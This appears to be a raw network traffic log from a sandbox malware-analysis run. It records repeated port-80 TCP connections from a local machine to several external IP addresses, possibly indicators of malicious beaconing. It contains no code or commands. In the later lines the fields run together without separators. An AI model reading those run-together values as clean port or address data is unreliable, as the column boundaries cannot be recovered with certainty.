Jan 11, 2025 09:27:42.813127041 CET  80           49716      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:43.412242889 CET  80           49716      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:43.412281990 CET  80           49716      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:43.412424088 CET  49716        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:44.314990997 CET  49716        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.334115028 CET  49717        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.338933945 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:45.339037895 CET  49717        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.348301888 CET  49717        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.353158951 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:45.957041025 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:45.957063913 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:45.957079887 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:45.957215071 CET  49717        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.959923983 CET  49717        80         192.168.2.8      103.224.182.242
Jan 11, 2025 09:27:45.964703083 CET  80           49717      103.224.182.242  192.168.2.8
Jan 11, 2025 09:27:51.002444029 CET  49737        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:51.007308960 CET  80           49737      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:51.007941008 CET  49737        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:51.025809050 CET  49737        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:51.030559063 CET  80           49737      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:51.616153002 CET  80           49737      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:51.616267920 CET  80           49737      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:51.616328955 CET  49737        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:52.533974886 CET  49737        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:53.552566051 CET  49756        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:53.557389975 CET  80           49756      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:53.557467937 CET  49756        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:53.572449923 CET  49756        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:53.577838898 CET  80           49756      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:54.173511028 CET  80           49756      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:54.173666000 CET  80           49756      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:54.173787117 CET  49756        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:55.080688000 CET  49756        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:56.100006104 CET  49774        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:56.104794979 CET  80           49774      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:56.105040073 CET  49774        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:56.120266914 CET  49774        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:56.125132084 CET  80           49774      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:56.125222921 CET  80           49774      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:56.721045971 CET  80           49774      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:56.721371889 CET  80           49774      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:56.721745014 CET  49774        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:57.627644062 CET  49774        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:58.651617050 CET  49790        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:58.656472921 CET  80           49790      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:58.656802893 CET  49790        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:58.666053057 CET  49790        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:58.670876026 CET  80           49790      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:59.264357090 CET  80           49790      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:59.264381886 CET  80           49790      185.27.134.206   192.168.2.8
Jan 11, 2025 09:27:59.264575005 CET  49790        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:59.267321110 CET  49790        80         192.168.2.8      185.27.134.206
Jan 11, 2025 09:27:59.272094965 CET  80           49790      185.27.134.206   192.168.2.8
Jan 11, 2025 09:28:05.408565044 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:05.413527966 CET  80           49836      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:05.414712906 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:05.429371119 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:05.434228897 CET  80           49836      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:06.336828947 CET  80           49836      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:06.336844921 CET  80           49836      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:06.336858988 CET  80           49836      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:06.336899042 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:06.336935043 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:06.939971924 CET  49836        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:07.959330082 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:07.964268923 CET  80           49856      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:07.966813087 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:07.982609034 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:07.987555027 CET  80           49856      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:08.906744003 CET  80           49856      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:08.906780005 CET  80           49856      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:08.906802893 CET  80           49856      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:08.906831026 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:08.906878948 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:09.488667965 CET  49856        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:10.507066965 CET  49873        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:10.512038946 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:10.512109995 CET  49873        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:10.528428078 CET  49873        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:10.533328056 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:10.533385992 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:11.490312099 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:11.490329027 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:11.490359068 CET  80           49873      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:11.493995905 CET  49873        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:12.033942938 CET  49873        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:13.053508043 CET  49889        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:13.058326960 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:13.058409929 CET  49889        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:13.070921898 CET  49889        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:13.075737953 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:14.008352995 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:14.008491993 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:14.008502007 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:14.009670973 CET  49889        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:14.014636040 CET  49889        80         192.168.2.8      165.154.96.210
Jan 11, 2025 09:28:14.019560099 CET  80           49889      165.154.96.210   192.168.2.8
Jan 11, 2025 09:28:19.049134016 CET  49928        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:19.054081917 CET  80           49928      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:19.054192066 CET  49928        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:19.075870991 CET  49928        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:19.080799103 CET  80           49928      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:19.760360956 CET  80           49928      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:19.760375977 CET  80           49928      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:19.766635895 CET  49928        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:20.580631971 CET  49928        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:21.599483967 CET  49944        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:21.604867935 CET  80           49944      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:21.606738091 CET  49944        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:21.621465921 CET  49944        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:21.626344919 CET  80           49944      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:22.302723885 CET  80           49944      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:22.302824020 CET  80           49944      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:22.302875996 CET  49944        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:23.127698898 CET  49944        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:24.146620035 CET  49964        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:24.151561022 CET  80           49964      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:24.151834965 CET  49964        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:24.169318914 CET  49964        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:24.174190998 CET  80           49964      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:24.174201965 CET  80           49964      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:24.867408991 CET  80           49964      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:24.867477894 CET  80           49964      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:24.867537022 CET  49964        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:25.674633980 CET  49964        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:26.693820000 CET  49981        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:26.698765993 CET  80           49981      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:26.698852062 CET  49981        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:26.711121082 CET  49981        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:26.716006041 CET  80           49981      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:27.387038946 CET  80           49981      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:27.387191057 CET  80           49981      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:27.390820980 CET  49981        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:27.393559933 CET  49981        80         192.168.2.8      45.141.156.114
Jan 11, 2025 09:28:27.398351908 CET  80           49981      45.141.156.114   192.168.2.8
Jan 11, 2025 09:28:32.939682961 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:32.944701910 CET  80           49998      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:32.944817066 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:32.962888002 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:32.967711926 CET  80           49998      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:33.767959118 CET  80           49998      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:33.830553055 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:33.854857922 CET  80           49998      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:33.862706900 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:34.471334934 CET  49998        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:35.490559101 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:35.495713949 CET  80           49999      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:35.496794939 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:35.511471987 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:35.516355038 CET  80           49999      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:36.313288927 CET  80           49999      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:36.361912012 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:36.401259899 CET  80           49999      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:36.401429892 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:37.019340992 CET  49999        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:38.038383961 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:38.043205023 CET  80           50000      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:38.043302059 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:38.059536934 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:38.064383984 CET  80           50000      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:38.064445019 CET  80           50000      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:38.892605066 CET  80           50000      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:38.939910889 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:38.985321999 CET  80           50000      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:38.985544920 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:39.597459078 CET  50000        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:40.616028070 CET  50001        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:40.621268034 CET  80           50001      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:40.621356010 CET  50001        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:40.632839918 CET  50001        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:40.637722969 CET  80           50001      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:41.467186928 CET  80           50001      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:41.561089993 CET  80           50001      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:41.561530113 CET  50001        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:41.562376976 CET  50001        80         192.168.2.8      202.79.161.151
Jan 11, 2025 09:28:41.568602085 CET  80           50001      202.79.161.151   192.168.2.8
Jan 11, 2025 09:28:46.586806059 CET  50002        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:46.591723919 CET  80           50002      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:46.591830969 CET  50002        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:46.607239008 CET  50002        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:46.612010002 CET  80           50002      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:48.111907959 CET  50002        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:48.123687983 CET  80           50002      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:48.123847961 CET  50002        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:49.131489038 CET  50003        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:49.136677980 CET  80           50003      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:49.136758089 CET  50003        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:49.157284975 CET  50003        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:49.162091970 CET  80           50003      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:50.658767939 CET  50003        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:50.663935900 CET  80           50003      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:50.663991928 CET  50003        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:51.678664923 CET  50004        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:51.683629990 CET  80           50004      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:51.686795950 CET  50004        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:51.702677011 CET  50004        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:51.708904982 CET  80           50004      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:51.708919048 CET  80           50004      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:53.206674099 CET  50004        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:53.211683989 CET  80           50004      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:53.218678951 CET  50004        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:54.224651098 CET  50005        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:54.229532003 CET  80           50005      188.114.97.3     192.168.2.8
Jan 11, 2025 09:28:54.230063915 CET  50005        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:54.242649078 CET  50005        80         192.168.2.8      188.114.97.3
Jan 11, 2025 09:28:54.248013020 CET  80           50005      188.114.97.3     192.168.2.8
Jan 11, 2025 09:29:33.788362980 CET  80           50005      188.114.97.3     192.168.2.8
                                                                              Jan 11, 2025 09:29:33.788929939 CET8050005188.114.97.3192.168.2.8
                                                                              Jan 11, 2025 09:29:33.794692993 CET5000580192.168.2.8188.114.97.3
                                                                              Jan 11, 2025 09:29:33.794974089 CET5000580192.168.2.8188.114.97.3
                                                                              Jan 11, 2025 09:29:33.799815893 CET8050005188.114.97.3192.168.2.8
                                                                              Jan 11, 2025 09:29:38.817807913 CET5000680192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:38.822685957 CET805000613.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:38.822753906 CET5000680192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:38.839350939 CET5000680192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:38.844119072 CET805000613.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:39.304763079 CET805000613.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:39.304862022 CET805000613.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:39.304930925 CET5000680192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:40.346290112 CET5000680192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:41.365145922 CET5000780192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:41.370065928 CET805000713.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:41.370522976 CET5000780192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:41.385353088 CET5000780192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:41.390597105 CET805000713.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:41.832416058 CET805000713.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:41.832472086 CET805000713.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:41.832547903 CET5000780192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:42.893659115 CET5000780192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:43.913355112 CET5000880192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:43.918268919 CET805000813.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:43.918343067 CET5000880192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:43.936975956 CET5000880192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:43.941878080 CET805000813.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:43.941924095 CET805000813.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:44.399095058 CET805000813.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:44.399130106 CET805000813.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:44.399382114 CET5000880192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:45.449394941 CET5000880192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:46.466828108 CET5000980192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:46.471704960 CET805000913.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:46.474858999 CET5000980192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:46.490703106 CET5000980192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:46.495537996 CET805000913.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:49.982904911 CET805000913.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:49.982963085 CET805000913.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:49.983083010 CET5000980192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:49.985748053 CET5000980192.168.2.813.248.169.48
                                                                              Jan 11, 2025 09:29:49.991188049 CET805000913.248.169.48192.168.2.8
                                                                              Jan 11, 2025 09:29:55.006726980 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.011642933 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.012834072 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.027281046 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.032171011 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602107048 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602121115 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602139950 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602150917 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602180958 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602194071 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602205992 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602217913 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602229118 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602289915 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.602332115 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.602332115 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.602332115 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.602332115 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.602332115 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.607183933 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.607211113 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.607251883 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.607258081 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.607259989 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.607304096 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:55.688910007 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.688925982 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.688940048 CET8050010203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:55.688992023 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:56.533982038 CET5001080192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:57.559459925 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:57.564311981 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:57.564380884 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:57.582504034 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:57.587322950 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153548956 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153764963 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153776884 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153789043 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153800964 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153810024 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.153825998 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153837919 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153840065 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.153850079 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153861046 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153862953 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.153872013 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.153882980 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.153915882 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.158688068 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.158750057 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.158761978 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.158798933 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.158832073 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.158868074 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:58.240406990 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.240427971 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.240442038 CET8050011203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:29:58.240495920 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:29:59.096360922 CET5001180192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.116179943 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.121166945 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.121295929 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.136533976 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.141340017 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.141521931 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703860998 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703902006 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703908920 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703918934 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703939915 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703946114 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703958035 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703983068 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.703982115 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.704063892 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.704091072 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.704097986 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.704134941 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.704197884 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.708813906 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.708848953 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.708857059 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.709146976 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.790126085 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.790147066 CET8050012203.161.42.73192.168.2.8
